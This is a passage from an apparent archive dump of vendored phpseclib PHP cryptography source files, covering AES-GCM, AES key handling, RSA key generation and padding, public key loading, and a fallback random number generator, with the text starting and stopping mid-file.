sodium_crypto_aead_aes256gcm_encrypt($plaintext, $this->aad, $this->nonce, $this->key); return Strings::shift($this->newtag, strlen($plaintext)); case self::ENGINE_OPENSSL_GCM: return openssl_encrypt( $plaintext, 'aes-' . $this->getKeyLength() . '-gcm', $this->key, OPENSSL_RAW_DATA, $this->nonce, $this->newtag, $this->aad ); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * @see self::encrypt() * @see parent::decrypt() * @param string $ciphertext * @return string */ public function decrypt($ciphertext) { $this->setup(); switch ($this->engine) { case self::ENGINE_LIBSODIUM: if ($this->oldtag === false) { throw new InsufficientSetupException('Authentication Tag has not been set'); } if (strlen($this->oldtag) != 16) { break; } $plaintext = sodium_crypto_aead_aes256gcm_decrypt($ciphertext . $this->oldtag, $this->aad, $this->nonce, $this->key); if ($plaintext === false) { $this->oldtag = false; throw new BadDecryptionException('Error decrypting ciphertext with libsodium'); } return $plaintext; case self::ENGINE_OPENSSL_GCM: if ($this->oldtag === false) { throw new InsufficientSetupException('Authentication Tag has not been set'); } $plaintext = openssl_decrypt( $ciphertext, 'aes-' . $this->getKeyLength() . '-gcm', $this->key, OPENSSL_RAW_DATA, $this->nonce, $this->oldtag, $this->aad ); if ($plaintext === false) { $this->oldtag = false; throw new BadDecryptionException('Error decrypting ciphertext with OpenSSL'); } return $plaintext; } return parent::decrypt($ciphertext); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/AES.php000064400000007231147600400120020176 0ustar00 * setKey('abcdefghijklmnop'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $aes->decrypt($aes->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @copyright 2008 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; /** * Pure-PHP implementation of AES. * * @author Jim Wigginton */ class AES extends Rijndael { /** * Dummy function * * Since \phpseclib3\Crypt\AES extends \phpseclib3\Crypt\Rijndael, this function is, technically, available, but it doesn't do anything. * * @see \phpseclib3\Crypt\Rijndael::setBlockLength() * @param int $length * @throws \BadMethodCallException anytime it's called */ public function setBlockLength($length) { throw new \BadMethodCallException('The block length cannot be set for AES.'); } /** * Sets the key length * * Valid key lengths are 128, 192, and 256. Set the link to bool(false) to disable a fixed key length * * @see \phpseclib3\Crypt\Rijndael:setKeyLength() * @param int $length * @throws \LengthException if the key length isn't supported */ public function setKeyLength($length) { switch ($length) { case 128: case 192: case 256: break; default: throw new \LengthException('Key of size ' . $length . ' not supported by this algorithm. Only keys of sizes 128, 192 or 256 supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths, AES only supports three. * * @see \phpseclib3\Crypt\Rijndael:setKey() * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (strlen($key)) { case 16: case 24: case 32: break; default: throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 24 or 32 supported'); } parent::setKey($key); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA.php000064400000066570147600400120020226 0ustar00 * getPublicKey(); * * $plaintext = 'terrafrost'; * * $ciphertext = $public->encrypt($plaintext); * * echo $private->decrypt($ciphertext); * ?> * * * Here's an example of how to create signatures and verify signatures with this library: * * getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * * * One thing to consider when using this: so phpseclib uses PSS mode by default. * Technically, id-RSASSA-PSS has a different key format than rsaEncryption. So * should phpseclib save to the id-RSASSA-PSS format by default or the * rsaEncryption format? For stand-alone keys I figure rsaEncryption is better * because SSH doesn't use PSS and idk how many SSH servers would be able to * decode an id-RSASSA-PSS key. For X.509 certificates the id-RSASSA-PSS * format is used by default (unless you change it up to use PKCS1 instead) * * @author Jim Wigginton * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\AsymmetricKey; use phpseclib3\Crypt\RSA\Formats\Keys\PSS; use phpseclib3\Crypt\RSA\PrivateKey; use phpseclib3\Crypt\RSA\PublicKey; use phpseclib3\Exception\InconsistentSetupException; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Math\BigInteger; /** * Pure-PHP PKCS#1 compliant implementation of RSA. * * @author Jim Wigginton */ abstract class RSA extends AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'RSA'; /** * Use {@link http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding Optimal Asymmetric Encryption Padding} * (OAEP) for encryption / decryption. * * Uses sha256 by default * * @see self::setHash() * @see self::setMGFHash() * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_OAEP = 1; /** * Use PKCS#1 padding. * * Although self::PADDING_OAEP / self::PADDING_PSS offers more security, including PKCS#1 padding is necessary for purposes of backwards * compatibility with protocols (like SSH-1) written before OAEP's introduction. * * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_PKCS1 = 2; /** * Do not use any padding * * Although this method is not recommended it can none-the-less sometimes be useful if you're trying to decrypt some legacy * stuff, if you're trying to diagnose why an encrypted message isn't decrypting, etc. * * @see self::encrypt() * @see self::decrypt() */ const ENCRYPTION_NONE = 4; /** * Use the Probabilistic Signature Scheme for signing * * Uses sha256 and 0 as the salt length * * @see self::setSaltLength() * @see self::setMGFHash() * @see self::setHash() * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_PSS = 16; /** * Use a relaxed version of PKCS#1 padding for signature verification * * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_RELAXED_PKCS1 = 32; /** * Use PKCS#1 padding for signature verification * * @see self::sign() * @see self::verify() * @see self::setHash() */ const SIGNATURE_PKCS1 = 64; /** * Encryption padding mode * * @var int */ protected $encryptionPadding = self::ENCRYPTION_OAEP; /** * Signature padding mode * * @var int */ protected $signaturePadding = self::SIGNATURE_PSS; /** * Length of hash function output * * @var int */ protected $hLen; /** * Length of salt * * @var int */ protected $sLen; /** * Label * * @var string */ protected $label = ''; /** * Hash function for the Mask Generation Function * * @var \phpseclib3\Crypt\Hash */ protected $mgfHash; /** * Length of MGF hash function output * * @var int */ protected $mgfHLen; /** * Modulus (ie. n) * * @var \phpseclib3\Math\BigInteger */ protected $modulus; /** * Modulus length * * @var \phpseclib3\Math\BigInteger */ protected $k; /** * Exponent (ie. e or d) * * @var \phpseclib3\Math\BigInteger */ protected $exponent; /** * Default public exponent * * @var int * @link http://en.wikipedia.org/wiki/65537_%28number%29 */ private static $defaultExponent = 65537; /** * Enable Blinding? * * @var bool */ protected static $enableBlinding = true; /** * OpenSSL configuration file name. * * @see self::createKey() * @var ?string */ protected static $configFile; /** * Smallest Prime * * Per , this number ought not result in primes smaller * than 256 bits. As a consequence if the key you're trying to create is 1024 bits and you've set smallestPrime * to 384 bits then you're going to get a 384 bit prime and a 640 bit prime (384 + 1024 % 384). At least if * engine is set to self::ENGINE_INTERNAL. If Engine is set to self::ENGINE_OPENSSL then smallest Prime is * ignored (ie. multi-prime RSA support is more intended as a way to speed up RSA key generation when there's * a chance neither gmp nor OpenSSL are installed) * * @var int */ private static $smallestPrime = 4096; /** * Public Exponent * * @var \phpseclib3\Math\BigInteger */ protected $publicExponent; /** * Sets the public exponent for key generation * * This will be 65537 unless changed. * * @param int $val */ public static function setExponent($val) { self::$defaultExponent = $val; } /** * Sets the smallest prime number in bits. Used for key generation * * This will be 4096 unless changed. * * @param int $val */ public static function setSmallestPrime($val) { self::$smallestPrime = $val; } /** * Sets the OpenSSL config file path * * Set to the empty string to use the default config file * * @param string $val */ public static function setOpenSSLConfigPath($val) { self::$configFile = $val; } /** * Create a private key * * The public key can be extracted from the private key * * @return RSA\PrivateKey * @param int $bits */ public static function createKey($bits = 2048) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } $regSize = $bits >> 1; // divide by two to see how many bits P and Q would be if ($regSize > self::$smallestPrime) { $num_primes = floor($bits / self::$smallestPrime); $regSize = self::$smallestPrime; } else { $num_primes = 2; } if ($num_primes == 2 && $bits >= 384 && self::$defaultExponent == 65537) { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } // OpenSSL uses 65537 as the exponent and requires RSA keys be 384 bits minimum if (self::$engines['OpenSSL']) { $config = []; if (self::$configFile) { $config['config'] = self::$configFile; } $rsa = openssl_pkey_new(['private_key_bits' => $bits] + $config); openssl_pkey_export($rsa, $privatekeystr, null, $config); // clear the buffer of error strings stemming from a minimalistic openssl.cnf // https://github.com/php/php-src/issues/11054 talks about other errors this'll pick up while (openssl_error_string() !== false) { } return RSA::load($privatekeystr); } } static $e; if (!isset($e)) { $e = new BigInteger(self::$defaultExponent); } $n = clone self::$one; $exponents = $coefficients = $primes = []; $lcm = [ 'top' => clone self::$one, 'bottom' => false ]; do { for ($i = 1; $i <= $num_primes; $i++) { if ($i != $num_primes) { $primes[$i] = BigInteger::randomPrime($regSize); } else { extract(BigInteger::minMaxBits($bits)); /** @var BigInteger $min * @var BigInteger $max */ list($min) = $min->divide($n); $min = $min->add(self::$one); list($max) = $max->divide($n); $primes[$i] = BigInteger::randomRangePrime($min, $max); } // the first coefficient is calculated differently from the rest // ie. instead of being $primes[1]->modInverse($primes[2]), it's $primes[2]->modInverse($primes[1]) if ($i > 2) { $coefficients[$i] = $n->modInverse($primes[$i]); } $n = $n->multiply($primes[$i]); $temp = $primes[$i]->subtract(self::$one); // textbook RSA implementations use Euler's totient function instead of the least common multiple. // see http://en.wikipedia.org/wiki/Euler%27s_totient_function $lcm['top'] = $lcm['top']->multiply($temp); $lcm['bottom'] = $lcm['bottom'] === false ? $temp : $lcm['bottom']->gcd($temp); } list($temp) = $lcm['top']->divide($lcm['bottom']); $gcd = $temp->gcd($e); $i0 = 1; } while (!$gcd->equals(self::$one)); $coefficients[2] = $primes[2]->modInverse($primes[1]); $d = $e->modInverse($temp); foreach ($primes as $i => $prime) { $temp = $prime->subtract(self::$one); $exponents[$i] = $e->modInverse($temp); } // from : // RSAPrivateKey ::= SEQUENCE { // version Version, // modulus INTEGER, -- n // publicExponent INTEGER, -- e // privateExponent INTEGER, -- d // prime1 INTEGER, -- p // prime2 INTEGER, -- q // exponent1 INTEGER, -- d mod (p-1) // exponent2 INTEGER, -- d mod (q-1) // coefficient INTEGER, -- (inverse of q) mod p // otherPrimeInfos OtherPrimeInfos OPTIONAL // } $privatekey = new PrivateKey(); $privatekey->modulus = $n; $privatekey->k = $bits >> 3; $privatekey->publicExponent = $e; $privatekey->exponent = $d; $privatekey->primes = $primes; $privatekey->exponents = $exponents; $privatekey->coefficients = $coefficients; /* $publickey = new PublicKey; $publickey->modulus = $n; $publickey->k = $bits >> 3; $publickey->exponent = $e; $publickey->publicExponent = $e; $publickey->isPublic = true; */ return $privatekey; } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { $key = $components['isPublicKey'] ? new PublicKey() : new PrivateKey(); $key->modulus = $components['modulus']; $key->publicExponent = $components['publicExponent']; $key->k = $key->modulus->getLengthInBytes(); if ($components['isPublicKey'] || !isset($components['privateExponent'])) { $key->exponent = $key->publicExponent; } else { $key->privateExponent = $components['privateExponent']; $key->exponent = $key->privateExponent; $key->primes = $components['primes']; $key->exponents = $components['exponents']; $key->coefficients = $components['coefficients']; } if ($components['format'] == PSS::class) { // in the X509 world RSA keys are assumed to use PKCS1 padding by default. only if the key is // explicitly a PSS key is the use of PSS assumed. phpseclib does not work like this. phpseclib // uses PSS padding by default. it assumes the more secure method by default and altho it provides // for the less secure PKCS1 method you have to go out of your way to use it. this is consistent // with the latest trends in crypto. libsodium (NaCl) is actually a little more extreme in that // not only does it defaults to the most secure methods - it doesn't even let you choose less // secure methods //$key = $key->withPadding(self::SIGNATURE_PSS); if (isset($components['hash'])) { $key = $key->withHash($components['hash']); } if (isset($components['MGFHash'])) { $key = $key->withMGFHash($components['MGFHash']); } if (isset($components['saltLength'])) { $key = $key->withSaltLength($components['saltLength']); } } return $key; } /** * Initialize static variables */ protected static function initialize_static_variables() { if (!isset(self::$configFile)) { self::$configFile = dirname(__FILE__) . '/../openssl.cnf'; } parent::initialize_static_variables(); } /** * Constructor * * PublicKey and PrivateKey objects can only be created from abstract RSA class */ protected function __construct() { parent::__construct(); $this->hLen = $this->hash->getLengthInBytes(); $this->mgfHash = new Hash('sha256'); $this->mgfHLen = $this->mgfHash->getLengthInBytes(); } /** * Integer-to-Octet-String primitive * * See {@link http://tools.ietf.org/html/rfc3447#section-4.1 RFC3447#section-4.1}. * * @param bool|\phpseclib3\Math\BigInteger $x * @param int $xLen * @return bool|string */ protected function i2osp($x, $xLen) { if ($x === false) { return false; } $x = $x->toBytes(); if (strlen($x) > $xLen) { throw new \OutOfRangeException('Resultant string length out of range'); } return str_pad($x, $xLen, chr(0), STR_PAD_LEFT); } /** * Octet-String-to-Integer primitive * * See {@link http://tools.ietf.org/html/rfc3447#section-4.2 RFC3447#section-4.2}. * * @param string $x * @return \phpseclib3\Math\BigInteger */ protected function os2ip($x) { return new BigInteger($x, 256); } /** * EMSA-PKCS1-V1_5-ENCODE * * See {@link http://tools.ietf.org/html/rfc3447#section-9.2 RFC3447#section-9.2}. * * @param string $m * @param int $emLen * @throws \LengthException if the intended encoded message length is too short * @return string */ protected function emsa_pkcs1_v1_5_encode($m, $emLen) { $h = $this->hash->hash($m); // see http://tools.ietf.org/html/rfc3447#page-43 switch ($this->hash->getHash()) { case 'md2': $t = "\x30\x20\x30\x0c\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x02\x05\x00\x04\x10"; break; case 'md5': $t = "\x30\x20\x30\x0c\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x05\x05\x00\x04\x10"; break; case 'sha1': $t = "\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14"; break; case 'sha256': $t = "\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x05\x00\x04\x20"; break; case 'sha384': $t = "\x30\x41\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x02\x05\x00\x04\x30"; break; case 'sha512': $t = "\x30\x51\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x03\x05\x00\x04\x40"; break; // from https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf#page=40 case 'sha224': $t = "\x30\x2d\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x04\x05\x00\x04\x1c"; break; case 'sha512/224': $t = "\x30\x2d\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x05\x05\x00\x04\x1c"; break; case 'sha512/256': $t = "\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x06\x05\x00\x04\x20"; } $t .= $h; $tLen = strlen($t); if ($emLen < $tLen + 11) { throw new \LengthException('Intended encoded message length too short'); } $ps = str_repeat(chr(0xFF), $emLen - $tLen - 3); $em = "\0\1$ps\0$t"; return $em; } /** * EMSA-PKCS1-V1_5-ENCODE (without NULL) * * Quoting https://tools.ietf.org/html/rfc8017#page-65, * * "The parameters field associated with id-sha1, id-sha224, id-sha256, * id-sha384, id-sha512, id-sha512/224, and id-sha512/256 should * generally be omitted, but if present, it shall have a value of type * NULL" * * @param string $m * @param int $emLen * @return string */ protected function emsa_pkcs1_v1_5_encode_without_null($m, $emLen) { $h = $this->hash->hash($m); // see http://tools.ietf.org/html/rfc3447#page-43 switch ($this->hash->getHash()) { case 'sha1': $t = "\x30\x1f\x30\x07\x06\x05\x2b\x0e\x03\x02\x1a\x04\x14"; break; case 'sha256': $t = "\x30\x2f\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x04\x20"; break; case 'sha384': $t = "\x30\x3f\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x02\x04\x30"; break; case 'sha512': $t = "\x30\x4f\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x03\x04\x40"; break; // from https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf#page=40 case 'sha224': $t = "\x30\x2b\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x04\x04\x1c"; break; case 'sha512/224': $t = "\x30\x2b\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x05\x04\x1c"; break; case 'sha512/256': $t = "\x30\x2f\x30\x0b\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x06\x04\x20"; break; default: throw new UnsupportedAlgorithmException('md2 and md5 require NULLs'); } $t .= $h; $tLen = strlen($t); if ($emLen < $tLen + 11) { throw new \LengthException('Intended encoded message length too short'); } $ps = str_repeat(chr(0xFF), $emLen - $tLen - 3); $em = "\0\1$ps\0$t"; return $em; } /** * MGF1 * * See {@link http://tools.ietf.org/html/rfc3447#appendix-B.2.1 RFC3447#appendix-B.2.1}. * * @param string $mgfSeed * @param int $maskLen * @return string */ protected function mgf1($mgfSeed, $maskLen) { // if $maskLen would yield strings larger than 4GB, PKCS#1 suggests a "Mask too long" error be output. $t = ''; $count = ceil($maskLen / $this->mgfHLen); for ($i = 0; $i < $count; $i++) { $c = pack('N', $i); $t .= $this->mgfHash->hash($mgfSeed . $c); } return substr($t, 0, $maskLen); } /** * Returns the key size * * More specifically, this returns the size of the modulo in bits. * * @return int */ public function getLength() { return !isset($this->modulus) ? 0 : $this->modulus->getLength(); } /** * Determines which hashing function should be used * * Used with signature production / verification and (if the encryption mode is self::PADDING_OAEP) encryption and * decryption. * * @param string $hash */ public function withHash($hash) { $new = clone $this; // \phpseclib3\Crypt\Hash supports algorithms that PKCS#1 doesn't support. md5-96 and sha1-96, for example. switch (strtolower($hash)) { case 'md2': case 'md5': case 'sha1': case 'sha256': case 'sha384': case 'sha512': case 'sha224': case 'sha512/224': case 'sha512/256': $new->hash = new Hash($hash); break; default: throw new UnsupportedAlgorithmException( 'The only supported hash algorithms are: md2, md5, sha1, sha256, sha384, sha512, sha224, sha512/224, sha512/256' ); } $new->hLen = $new->hash->getLengthInBytes(); return $new; } /** * Determines which hashing function should be used for the mask generation function * * The mask generation function is used by self::PADDING_OAEP and self::PADDING_PSS and although it's * best if Hash and MGFHash are set to the same thing this is not a requirement. * * @param string $hash */ public function withMGFHash($hash) { $new = clone $this; // \phpseclib3\Crypt\Hash supports algorithms that PKCS#1 doesn't support. md5-96 and sha1-96, for example. switch (strtolower($hash)) { case 'md2': case 'md5': case 'sha1': case 'sha256': case 'sha384': case 'sha512': case 'sha224': case 'sha512/224': case 'sha512/256': $new->mgfHash = new Hash($hash); break; default: throw new UnsupportedAlgorithmException( 'The only supported hash algorithms are: md2, md5, sha1, sha256, sha384, sha512, sha224, sha512/224, sha512/256' ); } $new->mgfHLen = $new->mgfHash->getLengthInBytes(); return $new; } /** * Returns the MGF hash algorithm currently being used * */ public function getMGFHash() { return clone $this->mgfHash; } /** * Determines the salt length * * Used by RSA::PADDING_PSS * * To quote from {@link http://tools.ietf.org/html/rfc3447#page-38 RFC3447#page-38}: * * Typical salt lengths in octets are hLen (the length of the output * of the hash function Hash) and 0. * * @param int $sLen */ public function withSaltLength($sLen) { $new = clone $this; $new->sLen = $sLen; return $new; } /** * Returns the salt length currently being used * */ public function getSaltLength() { return $this->sLen !== null ? $this->sLen : $this->hLen; } /** * Determines the label * * Used by RSA::PADDING_OAEP * * To quote from {@link http://tools.ietf.org/html/rfc3447#page-17 RFC3447#page-17}: * * Both the encryption and the decryption operations of RSAES-OAEP take * the value of a label L as input. In this version of PKCS #1, L is * the empty string; other uses of the label are outside the scope of * this document. * * @param string $label */ public function withLabel($label) { $new = clone $this; $new->label = $label; return $new; } /** * Returns the label currently being used * */ public function getLabel() { return $this->label; } /** * Determines the padding modes * * Example: $key->withPadding(RSA::ENCRYPTION_PKCS1 | RSA::SIGNATURE_PKCS1); * * @param int $padding */ public function withPadding($padding) { $masks = [ self::ENCRYPTION_OAEP, self::ENCRYPTION_PKCS1, self::ENCRYPTION_NONE ]; $encryptedCount = 0; $selected = 0; foreach ($masks as $mask) { if ($padding & $mask) { $selected = $mask; $encryptedCount++; } } if ($encryptedCount > 1) { throw new InconsistentSetupException('Multiple encryption padding modes have been selected; at most only one should be selected'); } $encryptionPadding = $selected; $masks = [ self::SIGNATURE_PSS, self::SIGNATURE_RELAXED_PKCS1, self::SIGNATURE_PKCS1 ]; $signatureCount = 0; $selected = 0; foreach ($masks as $mask) { if ($padding & $mask) { $selected = $mask; $signatureCount++; } } if ($signatureCount > 1) { throw new InconsistentSetupException('Multiple signature padding modes have been selected; at most only one should be selected'); } $signaturePadding = $selected; $new = clone $this; if ($encryptedCount) { $new->encryptionPadding = $encryptionPadding; } if ($signatureCount) { $new->signaturePadding = $signaturePadding; } return $new; } /** * Returns the padding currently being used * */ public function getPadding() { return $this->signaturePadding | $this->encryptionPadding; } /** * Returns the current engine being used * * OpenSSL is only used in this class (and it's subclasses) for key generation * Even then it depends on the parameters you're using. It's not used for * multi-prime RSA nor is it used if the key length is outside of the range * supported by OpenSSL * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } return self::$engines['OpenSSL'] && self::$defaultExponent == 65537 ? 'OpenSSL' : 'PHP'; } /** * Enable RSA Blinding * */ public static function enableBlinding() { static::$enableBlinding = true; } /** * Disable RSA Blinding * */ public static function disableBlinding() { static::$enableBlinding = false; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/PublicKeyLoader.php000064400000005221147600400120022601 0ustar00 * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\AsymmetricKey; use phpseclib3\Crypt\Common\PrivateKey; use phpseclib3\Crypt\Common\PublicKey; use phpseclib3\Exception\NoKeyLoadedException; use phpseclib3\File\X509; /** * PublicKeyLoader * * @author Jim Wigginton */ abstract class PublicKeyLoader { /** * Loads a public or private key * * @return AsymmetricKey * @param string|array $key * @param string $password optional */ public static function load($key, $password = false) { try { return EC::load($key, $password); } catch (NoKeyLoadedException $e) { } try { return RSA::load($key, $password); } catch (NoKeyLoadedException $e) { } try { return DSA::load($key, $password); } catch (NoKeyLoadedException $e) { } try { $x509 = new X509(); $x509->loadX509($key); $key = $x509->getPublicKey(); if ($key) { return $key; } } catch (\Exception $e) { } throw new NoKeyLoadedException('Unable to read key'); } /** * Loads a private key * * @return PrivateKey * @param string|array $key * @param string $password optional */ public static function loadPrivateKey($key, $password = false) { $key = self::load($key, $password); if (!$key instanceof PrivateKey) { throw new NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string|array $key */ public static function loadPublicKey($key) { $key = self::load($key); if (!$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string|array $key */ public static function loadParameters($key) { $key = self::load($key); if (!$key instanceof PrivateKey && !$key instanceof PublicKey) { throw new NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Random.php000064400000022461147600400120021010 0ustar00 * * * * @author Jim Wigginton * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; /** * Pure-PHP Random Number Generator * * @author Jim Wigginton */ abstract class Random { /** * Generate a random string. * * Although microoptimizations are generally discouraged as they impair readability this function is ripe with * microoptimizations because this function has the potential of being called a huge number of times. * eg. for RSA key generation. * * @param int $length * @throws \RuntimeException if a symmetric cipher is needed but not loaded * @return string */ public static function string($length) { if (!$length) { return ''; } try { return random_bytes($length); } catch (\Exception $e) { // random_compat will throw an Exception, which in PHP 5 does not implement Throwable } catch (\Throwable $e) { // If a sufficient source of randomness is unavailable, random_bytes() will throw an // object that implements the Throwable interface (Exception, TypeError, Error). // We don't actually need to do anything here. The string() method should just continue // as normal. Note, however, that if we don't have a sufficient source of randomness for // random_bytes(), most of the other calls here will fail too, so we'll end up using // the PHP implementation. } // at this point we have no choice but to use a pure-PHP CSPRNG // cascade entropy across multiple PHP instances by fixing the session and collecting all // environmental variables, including the previous session data and the current session // data. // // mt_rand seeds itself by looking at the PID and the time, both of which are (relatively) // easy to guess at. linux uses mouse clicks, keyboard timings, etc, as entropy sources, but // PHP isn't low level to be able to use those as sources and on a web server there's not likely // going to be a ton of keyboard or mouse action. web servers do have one thing that we can use // however, a ton of people visiting the website. obviously you don't want to base your seeding // solely on parameters a potential attacker sends but (1) not everything in $_SERVER is controlled // by the user and (2) this isn't just looking at the data sent by the current user - it's based // on the data sent by all users. one user requests the page and a hash of their info is saved. // another user visits the page and the serialization of their data is utilized along with the // server environment stuff and a hash of the previous http request data (which itself utilizes // a hash of the session data before that). certainly an attacker should be assumed to have // full control over his own http requests. he, however, is not going to have control over // everyone's http requests. static $crypto = false, $v; if ($crypto === false) { // save old session data $old_session_id = session_id(); $old_use_cookies = ini_get('session.use_cookies'); $old_session_cache_limiter = session_cache_limiter(); $_OLD_SESSION = isset($_SESSION) ? $_SESSION : false; if ($old_session_id != '') { session_write_close(); } session_id(1); ini_set('session.use_cookies', 0); session_cache_limiter(''); session_start(); $v = (isset($_SERVER) ? self::safe_serialize($_SERVER) : '') . (isset($_POST) ? self::safe_serialize($_POST) : '') . (isset($_GET) ? self::safe_serialize($_GET) : '') . (isset($_COOKIE) ? self::safe_serialize($_COOKIE) : '') . // as of PHP 8.1 $GLOBALS can't be accessed by reference, which eliminates // the need for phpseclib_safe_serialize. see https://wiki.php.net/rfc/restrict_globals_usage // for more info (version_compare(PHP_VERSION, '8.1.0', '>=') ? serialize($GLOBALS) : self::safe_serialize($GLOBALS)) . self::safe_serialize($_SESSION) . self::safe_serialize($_OLD_SESSION); $v = $seed = $_SESSION['seed'] = sha1($v, true); if (!isset($_SESSION['count'])) { $_SESSION['count'] = 0; } $_SESSION['count']++; session_write_close(); // restore old session data if ($old_session_id != '') { session_id($old_session_id); session_start(); ini_set('session.use_cookies', $old_use_cookies); session_cache_limiter($old_session_cache_limiter); } else { if ($_OLD_SESSION !== false) { $_SESSION = $_OLD_SESSION; unset($_OLD_SESSION); } else { unset($_SESSION); } } // in SSH2 a shared secret and an exchange hash are generated through the key exchange process. // the IV client to server is the hash of that "nonce" with the letter A and for the encryption key it's the letter C. // if the hash doesn't produce enough a key or an IV that's long enough concat successive hashes of the // original hash and the current hash. we'll be emulating that. for more info see the following URL: // // http://tools.ietf.org/html/rfc4253#section-7.2 // // see the is_string($crypto) part for an example of how to expand the keys $key = sha1($seed . 'A', true); $iv = sha1($seed . 'C', true); // ciphers are used as per the nist.gov link below. also, see this link: // // http://en.wikipedia.org/wiki/Cryptographically_secure_pseudorandom_number_generator#Designs_based_on_cryptographic_primitives switch (true) { case class_exists('\phpseclib3\Crypt\AES'): $crypto = new AES('ctr'); break; case class_exists('\phpseclib3\Crypt\Twofish'): $crypto = new Twofish('ctr'); break; case class_exists('\phpseclib3\Crypt\Blowfish'): $crypto = new Blowfish('ctr'); break; case class_exists('\phpseclib3\Crypt\TripleDES'): $crypto = new TripleDES('ctr'); break; case class_exists('\phpseclib3\Crypt\DES'): $crypto = new DES('ctr'); break; case class_exists('\phpseclib3\Crypt\RC4'): $crypto = new RC4(); break; default: throw new \RuntimeException(__CLASS__ . ' requires at least one symmetric cipher be loaded'); } $crypto->setKey(substr($key, 0, $crypto->getKeyLength() >> 3)); $crypto->setIV(substr($iv, 0, $crypto->getBlockLength() >> 3)); $crypto->enableContinuousBuffer(); } //return $crypto->encrypt(str_repeat("\0", $length)); // the following is based off of ANSI X9.31: // // http://csrc.nist.gov/groups/STM/cavp/documents/rng/931rngext.pdf // // OpenSSL uses that same standard for it's random numbers: // // http://www.opensource.apple.com/source/OpenSSL/OpenSSL-38/openssl/fips-1.0/rand/fips_rand.c // (do a search for "ANS X9.31 A.2.4") $result = ''; while (strlen($result) < $length) { $i = $crypto->encrypt(microtime()); // strlen(microtime()) == 21 $r = $crypto->encrypt($i ^ $v); // strlen($v) == 20 $v = $crypto->encrypt($r ^ $i); // strlen($r) == 20 $result .= $r; } return substr($result, 0, $length); } /** * Safely serialize variables * * If a class has a private __sleep() it'll emit a warning * @return mixed * @param mixed $arr */ private static function safe_serialize(&$arr) { if (is_object($arr)) { return ''; } if (!is_array($arr)) { return serialize($arr); } // prevent circular array recursion if (isset($arr['__phpseclib_marker'])) { return ''; } $safearr = []; $arr['__phpseclib_marker'] = true; foreach (array_keys($arr) as $key) { // do not recurse on the '__phpseclib_marker' key itself, for smaller memory usage if ($key !== '__phpseclib_marker') { $safearr[$key] = self::safe_serialize($arr[$key]); } } unset($arr['__phpseclib_marker']); return serialize($safearr); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH.php000064400000045341147600400120020065 0ustar00 * * * * @author Jim Wigginton * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\AsymmetricKey; use 